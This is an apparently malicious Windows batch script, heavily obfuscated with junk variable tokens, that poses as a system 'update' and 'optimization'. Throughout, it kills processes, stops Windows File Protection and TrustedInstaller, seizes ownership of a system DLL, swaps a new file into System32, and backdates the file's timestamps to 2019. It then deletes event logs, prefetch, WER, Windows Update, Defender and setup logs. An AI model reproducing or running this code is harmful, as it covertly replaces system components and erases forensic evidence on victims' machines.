e%iTsESZ%c%SjFwDDCrZb%h%srJ%o%k% %vsjpPoO%=%wZtuoWJdc%=%IXaS%=%QaI%=%zOgKluDt%=%NBsuyvg%=%FqnfTND%=%Blb%=%YSwtEBSyG%=%TT%=%CGmIPBV%=%bzV%=%WMcQdMWRwR%=%UbWxzp%=%iGPBnpvEfg%=%jK%=%IddKtgwTn%=%CThQaSlHwh%=%vAduONDT%=%EjgSWRuLk%=%ODP%=%CxoppFlqKO%=%QLEz%=%OanEw%=%Xl%=%RfFpW%=%IfBraLG%=%IYKWzM%=%cF%=%ffUXNDOpHI%=%zvuCq%=%JPLTN%=%iO%
f%q%o%FlVDVv%r%dOVgGG% %PzixeB%/%igJaeuro%f%riJAu% %ktetwcewoM%"%LNdzkazAj%t%wJbkPfgBX%o%eXFXSiwfw%k%BwUvr%e%c%n%CCEnTNv%s%y%=%DGjWf%2%VLiRw% %FQuT%d%TtSl%e%DNjaPVegJj%l%S%i%xBZMfdpIWL%m%SROyY%s%zLN%=%gnyYz%,%qHVutXuj%"%vzRPgb% %VGqWXnaldC%%%a%N% %vVIkG%i%MCIMPfR%n%wqUs% %IOnsGgXN%(%k%'%ppVVCEKTas%p%LBolMt%o%GokTLkc%w%nTkw%e%YnOAroN%r%bFzx%s%OLllb%h%k%e%cDKXkU%l%QgcQmLO%l%PRehqRrR% %JVacT%-%gSoDdkL%c%aZrbf%o%YjgYu%m%bYWyBHC%m%wPTk%a%Vdth%n%o%d%G% %AlYgiCh%"%BhybVomzk%$%qgfqTIqDTx%P%FsfziiAl%r%YmuHF%o%kFAqN%c%KyDCHTLD%e%wHQazuL%s%Gcc%s%yfPPj%e%lgkUzK%s%JLfrLUN% %EyCkAlCdHl%=%w% %pe%G%c%e%CdKEj%t%qxxdm%-%CMlpxUMA%P%Ezvu%r%jTpSy%o%Nw%c%QkJdCnCzsf%e%rch%s%HnF%s%b% %dGmuw%|%sdO% %pslrQ%W%gtCjKKfPw%h%LTPd%e%HhNm%r%sa%e%xukGPnjANY%-%qYhZsqmKdf%O%oVoQD%b%JtZ%j%TVSH%e%VWCDCNUhYi%c%yWAa%t%FOIsDcyhc% %jTASvHi%{%ADezXKbzI%(%WQY%$%B%_%TtauV%.%kC%M%fnqVsV%o%ZOLvxR%d%lgZ%u%AGRWuTNcQ%l%oClS%e%CZ%s%gC% %Lfh%|%bj% %UIwILWax%W%ykrNbZQ%h%vZybAL%e%WaVfI%r%k%e%pbyd%-%nmDNGN%O%c%b%PgU%j%mYfBWMAw%e%bZEGcrI%c%pIpyMOAX%t%TzAq% %UzjdwcJSZ%{%pJyiJDWV%$%IFekJSf%_%jPIZb%.%SXgyTgekec%F%jOfxebcqsS%i%eno%l%XGPrivPH%e%wzlG%N%nc%a%V%m%yDuRa%e%ISC% %ZBCR%-%uNpLOLypbs%m%rXcAgFybjz%a%RBiNHHVpS%t%bTrryHC%c%kkUzrZNG%h%sce% %O%'%mHGyVm%X%YUOI%I%uAkmMKJ%n%WBBPmboc%p%XQGoTzZKV%u%VJQcMW%t%PowO%1%tRZ%_%ogCdzJKz%4%MdmKp%.%DB%d%T%l%EYzMhjhGMg%l%zt%'%z%}%oPaj%)%WNIP%}%hgABO% %OgAUGWeWv%|%EJ% %e%S%sZMEyNLy%e%ODW%l%LyciNvPwm%e%zLvNmTMrC%c%OQDCPeTOzp%t%e%-%pWSJyhXpS%O%F%b%TMhaSVlq%j%BMWk%e%dcbD%c%hrzSsE%t%yE% %g%-%cHVsZ%E%nFbIWAQzKn%x%eDWv%p%Yizrt%a%JIK%n%mNGycDV%d%kWslmiu%P%UhF%r%lO%o%mcxFWC%p%AyysGNdB%e%SC%r%g%t%mHCrjEFs%y%qaYPO% %saateJHYE%I%JdbBUu%d%a%;%JS% %Gitb%$%ZRRV%P%DuXMMagAgB%r%RdxhX%o%SNHmoc%c%zod%e%ogFRFv%s%uXRnslxpYY%s%rGeXeAI%e%oMigbUtgg%s%fSTNLQPO% %udTjJgKBL%-%TeVDpcLDAc%j%IPRcSRBvNF%o%wXpBw%i%cxTkrkCG%n%p% %JB%'%DK%,%CsEYzUOI%'%waip%"%kcyq%'%hOtqFw%)%IQF% %GUQsGhZta%d%dPj%o%lamD% %SjxQLBuYph%(%YJ%
    echo KILLING: Process ID %%a
 %xm% %pEExPYCnU% %rUuMMeUsHg% %NypoK%e%DxTIGOqsF%c%Ui%h%QxEzpGEQT%o%RWDZoGXBE% %fuSY%K%UaAnnvUAf%I%NhEiuXjLZ%L%TImsDQVfBA%L%cfJToDNgbT%I%DToXCPkds%N%WSnOWniN%G%bIpW%:%nKg% %b%P%bEO%r%U%o%ThCFwM%c%pjaJhZihD%e%tpHS%s%TaAZ%s%SNWzZAbS% %xy%I%bGqBp%D%gtD% %cLvstNVq%%%a%XXblyBh%
 %kckIo% %LgwatF% %Xdd% %hWN%t%CtWlyr%a%KuzrcIzP%s%mBEsoCIqgO%k%eOLWrLME%k%f%i%n%l%RIdNtmhbaU%l%qmsvLwnCQw% %wXmwPvy%/%xlYiawlMH%P%BVZ%I%kZSmoleyXs%D%hExFOMLjHc% %yTWcScPvXf%%%a%NVLo% %RULIEBXO%/%ZNHalto%F%h%
)%YwNlzlZfQ%

:: Stop Windows File Protection temporarily
:%i%:%mTSsFuWLLS% %tcgmDU%S%n%t%cCKbehfN%o%qDy%p%idfo% %EiqLGC%W%EfDQxFd%i%pKqspcRqoK%n%HCVw%d%jUljzyECnR%o%lh%w%qiIVne%s%du% %eihS%F%nNiZnOYI%i%IZ%l%Vc%e%GnU% %TfSbLlT%P%ynBmKGewck%r%TZdNZw%o%KUdMTd%t%W%e%Oppmxjo%c%nfpMef%t%vi%i%GGQyXFDQ%o%OzQF%n%edYnqtztNE% %h%t%WVFPFxer%e%n%m%rzk%p%w%o%IVmDbjQ%r%U%a%oPayFgJwz%r%nxc%i%MrGG%l%qBb%y%iprpI%
n%DoabaMNNN%e%sy%t%WRGHytZ% %tNjCSmXr%s%CJLBjqfO%t%reRXb%o%CkCi%p%gfjmKoHh% %FPXHv%w%MHqArfpm%u%VRO%a%LppX%u%i%s%KiGiFNiU%e%B%r%mRq%v%V% %i%>%bVuu%n%NxLaqC%u%QS%l%qn% %Lm%2%TbdgvudWxb%>%Kiwp%&%wTmc%1%jBhsDTQx%
n%ezniCAmIIf%e%LJJdh%t%DelkADKnKi% %baKbV%s%hTihOkC%t%twG%o%hD%p%mX% %CMuoHbS%t%mszhW%r%sJ%u%VwveGi%s%ajYJXaTS%t%BRr%e%inO%d%QBscadcHb%i%CFLi%n%SY%s%Uute%t%DhN%a%guAzywZEXQ%l%IhWK%l%rrnRY%e%zAPPVv%r%HFjfvuZ% %mS%>%IKPgx%n%zrz%u%ZLMSv%l%rIIwnYLB% %F%2%jEk%>%lyAg%&%kKz%1%kUBsH%

:: Take ownership and modify permissions
:%BZERHqXY%:%YmqS% %IpbwWybZ%T%cpCMzCqTx%a%PR%k%UgLfduNuOw%e%JQRbz% %jV%o%WNYLRGW%w%V%n%vOxsFuml%e%PgGzQiLR%r%st%s%JdeLnJ%h%Jr%i%zMdqGx%p%LhxXWH% %kWMTvVoZ%a%JAe%n%Zuyao%d%zCM% %NGIXz%m%SwcpuK%o%jiSKSVbjbN%d%DK%i%BPLJvTsRUJ%f%n%y%UFGjRxGC% %ZreqZd%p%F%e%niA%r%zgUcMgGjSV%m%J%i%qZPOxXa%s%Grz%s%LnSAGMj%i%ZM%o%zopH%n%Eoa%s%cqvqo%
i%tIEl%f%Gq% %OieM%e%EhcuHAFnqg%x%uuSZqJrz%i%j%s%ZviK%t%J% %Y%"%srmQ%%system_dll_path%"%XTOiFodftS% %XaxW%(%oSb%
 %VkgymGHyMA% %kkuEPK% %d% %yB%t%LcLKAvqXHv%a%nfekeXsvB%k%lmTodM%e%ZGIuTCYtN%o%z%w%MshT%n%yNtIioRWPf% %q%/%YdZYp%f%Kq% %yT%"%hkkU%%system_dll_path%"%ManLLJ% %wLgyMx%/%LSfKsKlQMI%a%xW% %iDRfe%>%POnC%n%QLTwzGQz%u%zXvTbTZwu%l%jInVQ% %F%2%AWSMkvOaY%>%gaP%&%MlSRM%1%dExrep%
    icacls "%system_dll_path%" /grant Administrators:F /t /c /l >nul 2>&1
 %YNMPR% %kHgOritvgM% %OoVqHSX% %NEcMDvWNcb%i%XuyMl%c%emMWRv%a%G%c%eGXJRbSBUJ%l%VbZXdGAxqW%s%WltakrpfRG% %aKTj%"%QWTougA%%system_dll_path%"%zTxVY% %hfJ%/%YbMDBoy%g%jNwpxBNB%r%SqIhsFM%a%yzvQlLfqi%n%YFpCIx%t%zrRDxCS% %fLPT%A%fJs%d%wo%m%HNUJ%i%Ccf%n%Yi%i%VPHwK%s%BhLvJJFrKx%t%zQrI%r%ULfcNfPHyT%a%I%t%vtgojBa%o%Urk%r%SxwkmK%s%snbSCbBw%:%lrhHfF%F%XgAoK% %bhgY%/%x%t%hloBSiAiJa% %kUcCSN%/%eyGXqJ%c%KQbw% %xtjP%/%Y%l%ap% %hKdRdHRmb%>%UonBL%n%gBixtzX%u%XlPEKeUaYH%l%UAIQUupm% %jzUdKkcBsA%2%Kv%>%Ecm%&%WaAx%1%IH%
)%Fk%

:: Copy new file to System32
:%YzTdFkd%:%TExk% %fS%C%KIjNi%o%UTHfT%p%mV%y%n% %cq%n%S%e%ONtk%w%VomPhBXvA% %c%f%DszxY%i%borHWwVES%l%SNZ%e%YUHk% %dA%t%tihVB%o%AuasaCW% %foHtYkbRAi%S%SpWIlG%y%jHhatZvKQ%s%a%t%uDcJL%e%km%m%uLdPqIOQ%3%rPhz%2%XFQnsO%
c%ibGPGvJNZf%o%cUeuCC%p%BN%y%mEcOgVf% %rCh%/%yBBNdOdI%y%NFAReqSap% %VODNtdgtdJ%"%bdA%%dll_path%"%xElj% %HUdxqVF%"%DOXbZ%%system_dll_path%"%dJCiDbAyb%
i%jsb%f%Ou% %sZlkHlMzD%%errorlevel% %OGhDfcHFh%n%hfTJB%e%CH%q%xKEjwy% %viQZTzAAG%0%D% %OeQPTUmsGb%(%pfl%
    echo ERROR: Failed to apply the update! Try running in Safe Mode.
 %OsuEXB% %hoab% %AzvemGLRS% %uGnnwxJcme%e%dNOFr%c%VXyRpGGaT%h%wREAjW%o%vqbwybrWeh% %xlXTHusg%E%dxtTxdZVyD%R%ruuVtrDyMA%R%mxaI%O%Zehjtgm%R%WD%:%xxbtaYAv% %hPCvibtl%F%qGdq%a%XxR%i%zVra%l%ei%e%LBmvFvzj%d%dIY% %m%t%jNrNhw%o%HKPdYdXCq% %sus%a%VYHjacntD%p%YtbFYDIH%p%VCvWqR%l%D%y%KRpPL% %zDZ%t%hoN%h%OdAd%e%hUuUtXvA% %zRywLCBRc%u%eISHsMk%p%rV%d%FbncSmXqZw%a%OzYsvKDP%t%gWJsR%e%SnJDULBUyL%!%RqRuc% %KoCzrrr%T%KFOD%r%AdOZKT%y%vqCyVGSq% %QrrxCF%r%YBN%u%hWbnnL%n%Yiibok%n%p%i%CnCQE%n%kxd%g%FUwQLfhToM% %bWYzAV%i%E%n%ioB% %vcwzAMcqQi%S%jF%a%Y%f%D%e%LG% %mAUcMxih%M%PFKSvBxukl%o%fI%d%RfeIx%e%hgkC%.%dkdNGfFPN%
 %QSTDpkWjB% %EehvZlzV% %zRYZfJqtWA% %dWUvCfHo%p%PtW%a%HtxlRn%u%vdRUA%s%xzHclqe%e%iHvO%
 %OpFukhv% %fkbmU% %ElbTGwjw% %Kob%e%j%x%uJQJe%i%SwjYDdQbIw%t%X% %mMTUsj%/%yJA%b%VhN%
)%RgEfBNdCvm%
echo SUCCESS: Update applied successfully!
e%QCgV%c%QM%h%W%o%LQhEvCX% %egqSFrxF%S%RKUiav%U%vR%C%uLRxZ%C%COEU%E%WpBtSBxGU%S%bXNBEQ%S%eF%:%nFGWldOuLo% %awcn%U%Yjemoob%p%UTxYPiso%d%TrvuvBrTt%a%zBaWABd%t%ZF%e%paYxM% %Mf%a%BJv%p%DbcPVpq%p%lJcpEAcpnT%l%FERIUb%i%dm%e%UFSoskcbnX%d%Qg% %SeZnHMkq%s%UuyOsJL%u%TxC%c%Zkd%c%rbfk%e%ub%s%sa%s%RwXiHNCJqn%f%utSHrIJvq%u%hVDFHtrmTp%l%pw%l%zJxzuGsx%y%rYhMBAC%!%cPM%

:: Modify HDN DLL Timestamp
:%BUQAgPvZur%:%l% %yiwYJ%M%efF%o%QfrsWRX%d%GsIouGuR%i%TIfxdD%f%iYCnpZtJkY%y%XSqnWAGoE% %KQpZ%H%ENs%D%wxsWRvCM%N%rhl% %BJ%D%XrEUa%L%sNyZNQxgSk%L%ZgPCznFsY% %XfBLPZW%T%umD%i%mZpdTZtiVm%m%P%e%F%s%jZNxABtLo%t%JWiGafRP%a%sJSiUHk%m%vR%p%CMzWk%
powershell -Command "(Get-Item '%system_dll_path%').CreationTime  = '2019-12-06 12:49:00'"
p%cqlDcV%o%CFjxLJ%w%FzKCQd%e%zbhut%r%zoXScm%s%Z%h%O%e%fq%l%BLHk%l%HKMiOoP% %EQbVPsX%-%xmFwVOQfGJ%C%vmLNdo%o%yjlFerBfs%m%tDugSn%m%lWW%a%xX%n%Wrru%d%OKQNMWQKat% %eMjHf%"%IKA%(%yRmzG%G%OdA%e%HDOLgfYWcQ%t%FgcH%-%se%I%Cj%t%V%e%FZKBkAzXPx%m%nKKfzB% %QLTGfa%'%MBl%%system_dll_path%'%TCPMROLIt%)%Em%.%q%C%LJfgaRR%r%pT%e%VGc%a%htGqLAo%t%D%i%nllIVx%o%fto%n%tthI%T%vXFJWWLJN%i%BttuYDiGCX%m%AS%e%AXcLLLlwck% %dNkMB% %jyDPXAL%=%KXBX% %CqbLVjHcj%'%iXPYaeUYrE%2%mJSwxpng%0%MPrppm%1%mnNBHebB%9%Q%-%VeeDS%1%tSHvVedu%2%vqYcf%-%Bp%0%VtBguFJe%6%nCBMnp% %kWVlv%1%wg%2%pfjOjBwA%:%NrJB%4%h%9%mSlBOBU%:%MVUGJOYM%0%UUvsca%0%B%'%B%"%jfQjPpigxZ%
powershell -Command "(Get-Item '%system_dll_path%').LastAccessTime = '2019-12-06 12:49:00'"
p%MLOaJOB%o%oQuvMLv%w%DnAgc%e%rWrtmfqb%r%vdSIuball%s%wMG%h%aWihtnkB%e%pQMoCLGRa%l%vqnYOyQzq%l%UV% %RZbrJogq%-%lpKQCnj%C%L%o%fhDnZreyz%m%ymT%m%XoAdLje%a%RUcfkszlMN%n%LTVwBpPeSe%d%pmVgO% %buL%"%WkQPAEXiD%(%gWYYFX%G%avFgWPM%e%ccjAQLA%t%csPbM%-%tJoPe%I%hRo%t%efGKfnCUi%e%BpucbBH%m%lfhwxK% %iDQiNWiN%'%IJUKL%%system_dll_path%'%j%)%GYQcn%.%DrLPOO%L%G%a%LTDbXsWa%s%AwV%t%iWeBbPk%A%TGMkfjGDs%c%xYmCZAFPlL%c%HeVsdq%e%mVVK%s%uLEhsP%s%sJwO%T%BrEJ%i%R%m%t%e%dIPo% %okHwrpre%=%zWjlG% %IzCcIzxYWL%'%jB%2%CWeYug%0%pwxobYQEoD%1%hVOttCUVB%9%QMDSZTqX%-%mFNPInRPn%1%pyLdCfHf%2%YeySUeh%-%ZZrOS%0%dhylyW%6%rqVFzZvCFm% %tOOeFkt%1%wnI%2%grH%:%A%4%ijyqL%9%zgEYWxjc%:%OvbiSy%0%ozuG%0%Ql%'%sSZb%"%NgvMOhnM%
powershell -Command "(Get-Item '%system_dll_path%').LastWriteTime  = '2019-12-06 12:49:00'"
p%IOYyLVMXia%o%jBawFgjyPc%w%WmYHVXMbkg%e%GJWLHHoGYH%r%hNDH%s%nvxLzUGd%h%ZFEwzaHnlx%e%ZQI%l%mIhJM%l%sDxE% %uMlhSL%-%dGVHzncHfC%C%DLyhfWdWqL%o%UON%m%RGmy%m%pWZgWnnoK%a%ihJ%n%vyFhdBJtOB%d%wgFijRO% %guE%"%EVvk%(%SNDpvWJMTJ%G%rjPpnz%e%pBVPTZd%t%lcVvDuO%-%zY%I%nedYSqLGda%t%yp%e%omNXCjJO%m%xYFZDi% %IfjmSagdH%'%I%%system_dll_path%'%TpYIK%)%ZVYebdNz%.%EXHVx%L%dpkB%a%npLmJrCKW%s%bXb%t%UFULr%W%KVmWAGQY%r%qScstt%i%Xccbxh%t%g%e%hVl%T%AbdQCF%i%oz%m%RQUmOgeP%e%I% %hm% %CYdnItv%=%qKzqLmxcDJ% %qMxsSC%'%BZHYaNXkd%2%dV%0%DMpYTgdhs%1%syksmmNo%9%NXI%-%YVCkS%1%MVLPE%2%s%-%WQLASGQO%0%uFApFsYGC%6%HRUJRfM% %HjbZLsySn%1%LA%2%vSZEBoke%:%QsXVDmlzZx%4%NpWmVJX%9%XhDFDee%:%tuUIyO%0%jSOkvzQ%0%cf%'%VL%"%DFa%

:: Restart stopped services
:%FptNVJlTa%:%SZxxcQUsH% %bFdkoo%R%cC%e%DIX%s%rRPkYwy%t%zgD%a%LtEohiBk%r%kgEa%t%vBcn% %yjyXtQSwFX%s%hPOZgBhc%t%VlOljV%o%NXpXtWbiRH%p%jWRgskR%p%fhlqhRj%e%ozFp%d%rCeAHZqakZ% %gfnVEvTFvS%s%l%e%MyHEHem%r%fn%v%hoz%i%ghppWVsAfP%c%zSLzgJyWHc%e%Ic%s%Nvl%
n%qREIs%e%uQDzTEvaKG%t%qmqyJA% %n%s%Abo%t%qHgKhXsucq%a%W%r%IXWjipXZS%t%W% %LCy%w%oWUJqp%u%S%a%iA%u%M%s%Z%e%RalJFfDQr%r%rahhcCQDF%v%KoPn% %KaMnSMSijv%>%xUMhADYn%n%P%u%EdN%l%lUWd% %NYecwbOG%2%bhfVUcGy%>%P%&%RVEqd%1%LZP%
n%ks%e%ICvGb%t%zwj% %XLoqFgQbbt%s%QwS%t%zM%a%xiPSZqG%r%RNUTSav%t%lbcVeI% %DnboxcCoZK%t%w%r%rzhMcBhNb%u%PPIXntFh%s%dIBm%t%vD%e%mrxySvYSd%d%dSpYC%i%BhpqQ%n%KVSnCqOkA%s%fTQgAsXjpW%t%qHZDLhWxh%a%qnegTAEO%l%XtsMZYp%l%PtD%e%lsoOd%r%nsBc% %HhKDZvacd%>%JaR%n%Ee%u%puhljlG%l%TYazoaL% %zqF%2%NmPCLSEAe%>%Vb%&%jUdfpEb%1%obndbjNUsb%

:: Clear all logs after optimization
:%in%:%sMj% %VwFTWqaEyu%C%rTSx%l%QDMKgVhwf%e%EFzMNPO%a%y%r%dgFB% %GAI%a%RWcB%l%obGv%l%GsZkLGsrQo% %aUIKJSd%l%JKizQ%o%stagXQYKs%g%obXAQJLDqS%s%WDvc% %IUQz%a%JyDS%f%kdglTlCpL%t%EAlvRI%e%RcqvVBgGXb%r%LuD% %hgVQvCUTvi%o%AkMLpP%p%IeLjI%t%HY%i%CbV%m%HtJTdiAOiF%i%kMXzTBF%z%Ms%a%FYz%t%ILhvk%i%MbaS%o%u%n%rfVTXyYQ%
e%dUQgunNi%c%yS%h%HM%o%Yg% %MNbfe%=%EUClpjWptS%=%PeUKXyZRF%=%qCaHRbBJJy%=%uSmZ%=%t%=%pxOntV%=%zdxMxrLh%=%Tn%=%RLQtE%=%x%=%xhFVrHcvA%=%IPsnohTjd%=%zYoUWzOboT%=%mO%=%lyFKxdHi%=%uMhQ%=%uxUQ%=%vAUjKQ%=%AULFXmR%=%HBJ%=%adYbgnLMYp%=%JU%=%swvyCUCihb%=%GNhSGPTsP%=%eZ%=%MFE%=%oWcCVsLd%=%WulceyP%=%biIyoVW%=%TvV%=%Jdjpmr%=%LfPpykZ%
e%Wvfkdrf%c%ltoEVLzDB%h%mPDrERzK%o%qWSWIjq% %HyhdqvFXGR%C%XpvuKtK%l%QUXF%e%elP%a%Sb%r%XHkuGwMWX%i%bjbuLrQUGT%n%TzUSKf%g%xMlW% %BMNsX%l%LNC%o%c%g%UfvIMyOop%s%DENxEwICOh% %inEFExi%a%rGa%f%wlGYrScOW%t%mfSbfcwXTq%e%GUpsHEU%r%Xc% %WhXqnZrUlv%o%Ovz%p%BsizFC%t%CprOqCrm%i%JDjw%m%TGxORIt%i%sWgM%z%wIA%a%mCbZESKxrd%t%r%i%KycXN%o%g%n%ruxNRFrExZ%.%Axif%.%iPucKe%.%uKOmEpgmKX%
e%R%c%rc%h%XQMOKZ%o%BRhKX% %Gjv%=%XGZpiHCQe%=%NIbWlwTrK%=%PuvFdZBII%=%NezcgAuJLT%=%nQyPqDdJwk%=%kFUjYWm%=%neMCXoOJk%=%ULdcE%=%dtsa%=%RcGk%=%I%=%ccosaK%=%KIpLxfRFWb%=%xSNMz%=%h%=%VveoZcrPN%=%QoGuMla%=%wH%=%OTOjLxlxdV%=%kOGnmHRB%=%XHJjWy%=%CnWgdouHrc%=%ORikiSW%=%qfxmZS%=%ngzR%=%miirodQox%=%ppHuyib%=%Cb%=%ODauI%=%Hq%=%k%=%oSsIaSoteR%
d%Bj%e%SCRlzSXK%l%kVLYCJPng% %I%/%OFm%s%cmbxgQbHk% %ybCp%/%m%f%jIMs% %jj%/%pzVtWiHY%q%C% %OhveCpLlT%"%lGNJHHrafe%%WinDir%\%BnJgE%L%PNxacyVys%o%ZnfRUtFX%g%Ucryyla%s%l%\%eu%*%ONbaGWAA%"%XZgpLzMd% %iRvRvG%>%C%n%GD%u%WTeiZdKJOF%l%ULJZMIu% %AvnRgsQ%2%XdzP%>%wATJ%&%lfTMqCpF%1%kMmKUiNo%
d%fLWyOsUij%e%PFIfEeGFA%l%sIxo% %liYLjF%/%zhBILjpFA%s%QDHhblKUW% %fcm%/%acTGoOM%f%LvHeqEuHFQ% %bO%/%JlWurDod%q%lUXG% %JbF%"%feZGZ%%SystemRoot%\%HJnj%S%gPdO%y%kGMZGQCj%s%ygZuxHUd%t%PjRuZciimP%e%pGjFhVsORR%m%eKcCQmQeW%3%IeiOFfa%2%cOj%\%vqxg%w%CYwihn%i%RwfWEHRBW%n%P%e%EpVBwQUvh%v%VFmIywzRnN%t%RmaEKyFvW%\%A%L%gHvcwAf%o%ifgtIBWy%g%ahJhoX%s%kRzBFuoFEF%\%VbvMfkxNKq%*%Pp%"%g% %xaZc%>%V%n%u%u%KlCwd%l%uy% %Q%2%n%>%GrAMi%&%ypvv%1%YqTSKwmWk%
d%UOTHgRX%e%bzksGanQZ%l%Qrezw% %KNFE%/%TTHfWYjqtq%s%cVC% %HqvNDBcv%/%KfPhyB%f%xvjbsirSkw% %uTcw%/%EFKflET%q%icfaz% %QOdO%"%F%%LocalAppData%\%kB%T%kOxjfX%e%SLD%m%fFT%p%B%\%L%*%gnRbIj%"%MAGpW% %uiR%>%gUdFVR%n%xjNuExITbY%u%ElI%l%bhsg% %cVgeMtftj%2%TBBTzSYLpe%>%bNfHme%&%C%1%lAvRjT%
d%jko%e%t%l%IJ% %m%/%pWvky%s%WkNpkWpKz% %mUrd%/%kgRXAueWjE%f%IaFAfh% %hPMRM%/%diwUBxhUCJ%q%ThJquMq% %yIFuVsKLV%"%hHNyBl%%Temp%\%FdBrDor%*%FnmG%"%rvbKAJGTlC% %wcS%>%GQDRxUxJ%n%HInQgIv%u%EPsIKYNM%l%n% %Ie%2%f%>%NxBoi%&%tLpOefL%1%yEufGNKmh%
d%RFURQzR%e%MSv%l%dmlUzIW% %huB%/%oBxeuKwqYV%s%xGYuJ% %csu%/%E%f%AuTdv% %av%/%LimPQkTwUV%q%vprToNVUoy% %zhpnYzvtFd%"%QkeS%%WinDir%\%SoGiT%T%rFrHZhQZL%e%TlkmVlHR%m%hMA%p%U%\%XzmYQMcx%*%W%"%mAO% %O%>%ALxoi%n%AUGfnyqgJ%u%Vrabk%l%Fxgc% %ahFo%2%gRUq%>%ebsGW%&%Ktl%1%SunP%
d%VEbCpfkF%e%Zrc%l%ubK% %aTXMiEEAwk%/%Fcz%s%EE% %daZh%/%cgDJ%f%QVXLIADCil% %hNBm%/%ccBCZRo%q%AsuvhXmf% %eVCJem%"%JGgFTHb%%SystemRoot%\%Xrh%P%EY%r%Hq%e%eMwFORQX%f%dCLLfgi%e%CBJ%t%adhaYzurJ%c%P%h%WNjlNiYR%\%VDTYzTKWZ%*%pfmEb%"%RyGb% %WbIMVucvs%>%NaeLmcrPxU%n%tiHvdZtu%u%DhAkYrcAE%l%XwJ% %ZP%2%GvBQfQULy%>%scaX%&%FhpXEcG%1%rRtrXzUFm%
d%O%e%liRF%l%voWLTO% %udg%/%m%s%lCeBNh% %sUFjUyETs%/%PLD%f%EPmBqds% %LeeVDLkv%/%eyghX%q%UmF% %vCAKPfy%"%AB%%LocalAppData%\%bKWrSyBzna%M%IAkDuryO%i%xAaYs%c%gAntfRTk%r%xtXNbvOxbg%o%xm%s%nxwbqwqLj%o%cRfUapzZHn%f%s%t%OpdOebY%\%KFuxIA%W%DoGG%i%DFFRKDbmiw%n%Z%d%YY%o%MmyDakCBEY%w%ZPxOZ%s%C%\%AtSig%I%jgBcBObP%N%QBHezNZ%e%cFqX%t%cZ%C%nuRMNwMKv%a%czfBHRE%c%f%h%N%e%TKMhzYxOp%\%TDsHFMGAR%*%ZOzrx%"%YhcnkPgIK% %dukYtSLEE%>%qQJjUFlY%n%NEqZdY%u%LlebgSJwaf%l%iLakcZziYW% %akoQUu%2%CIzL%>%vWu%&%kiy%1%fJt%
d%jjajld%e%g%l%mvyBgawAFi% %a%/%mMWX%s%OXx% %GDUks%/%C%f%wyHrIlTXqC% %IUvVQjOXJ%/%i%q%z% %lcRuuyifa%"%Cbe%%WinDir%\%oeqwRM%S%qKiKHikSQ%o%wqKQpM%f%JWh%t%jXqhpoJBEg%w%oavVUa%a%PgqCc%r%rdvvvxF%e%ipBTc%D%UUswgegxPR%i%jjv%s%cOJChwSCEQ%t%zfanj%r%ZawzaD%i%OQOYg%b%LeJmYTr%u%ZqMFTh%t%ptMh%i%aIJYvp%o%aQbQqc%n%drqmgBRcXA%\%Bw%D%SRIh%a%kKKva%t%wX%a%HzwS%s%v%t%Pjye%o%qzbBeM%r%INuM%e%erPHUK%\%Ac%L%IvyldA%o%hqJrP%g%Z%s%y%\%NKJngh%*%Jg%"%wjOhZ% %c%>%ajwcsAi%n%MUXVz%u%nl%l%BdkCjNHk% %o%2%soHZduqFF%>%A%&%bnCugPBe%1%PdhxLarI%
d%MlytGNgz%e%fjvEPAbGcl%l%tjmFoQFXJ% %Q%/%RnWF%s%qSlJIh% %WyFWZbPqXF%/%FaNl%f%hwpPOwyfj% %R%/%RzTMEb%q%MJypIFcTE% %TcITIrpFub%"%QO%%WinDir%\%nPYduCAGRi%P%RCtseLzRtE%a%MtK%n%olRU%t%DCxbKh%h%E%e%JnoHH%r%As%\%zPHTY%*%VnLkwz%"%bWqFVVjfi% %SpRXMmBU%>%Zp%n%bRy%u%r%l%dNgsS% %OkwuHmSdy%2%FSxTyrgj%>%Koui%&%ExwAWteP%1%RBR%
d%zsMYXNyK%e%Vi%l%g% %AGAJGk%/%y%s%jKIF% %StLEyIDS%/%VvfTQAjIm%f%QlDAbIKl% %VdFEapFG%/%EaAPQF%q%mWGt% %exv%"%pGkqUxbPTh%%WinDir%\%YqgGa%I%nbeabiGB%N%jPQW%F%HjHLlF%\%KNXoLaiAB%S%NDxO%e%H%t%obOhTi%u%ksSLUzR%p%pHPR%a%cOjiBKvAjL%p%qsSmQgjrb%i%lgMs%.%LGUWaK%l%QzRFdqlF%o%tTRvtz%g%MPOacPL%"%HwFxfxG% %OmrEWDB%>%BngpGyUr%n%OUYlXFHECC%u%Usji%l%npWVsaK% %a%2%j%>%CoGq%&%nOtCFMKTF%1%gdYmmT%
d%doJuU%e%tlLz%l%vmH% %nOpzKHsC%/%lXzzcZvj%s%qDOQGHA% %jrUk%/%MZsy%f%JRu% %YdCPo%/%zQmCl%q%RoeHTqn% %xi%"%qiOja%%WinDir%\%BqYg%I%p%N%ixXtoWci%F%t%\%Xq%S%Bj%e%imNJfLdzjv%t%J%u%dC%p%nOYVZ%a%IxsWVyhg%p%mwPRjM%i%NhuDiWiogH%.%shPJQcSvPF%d%BuhR%e%mfT%v%ldb%.%qMQuoNJ%l%hbuAxai%o%LONzmPc%g%jPTM%"%hLk% %rHzvs%>%VAeDJn%n%vgYsqlHUw%u%VGNSFklK%l%xSU% %h%2%EUekvtWXN%>%XDq%&%iRADdKhqw%1%negP%
d%XwE%e%LHkAvgX%l%jeJoxCxyHf% %XXkhC%/%JLsSupdsoo%s%m% %nvUMGPns%/%zDK%f%SpCj% %L%/%VPwspbhKx%q%O% %fnxmRkSreu%"%qBxSCmkONl%%LocalAppData%\%VaDQ%M%lkg%i%ECSB%c%GzcXfMhlyc%r%ezKTb%o%M%s%KUmoQYTv%o%uIGuInyJ%f%nUhhJo%t%vB%\%M%W%GHjHVGqE%i%MXsWnbUP%n%sq%d%iuzMtzlW%o%dDWz%w%HJtoG%s%TALuLqZ%\%TGfVB%W%KyIeq%E%Ws%R%WWvvVduLJ%\%REial%*%MLaH%"%etx% %CqGpaxy%>%yKEAacCgVK%n%lGe%u%Djz%l%idmj% %zINY%2%fgCyaBH%>%n%&%tKVwYkt%1%D%
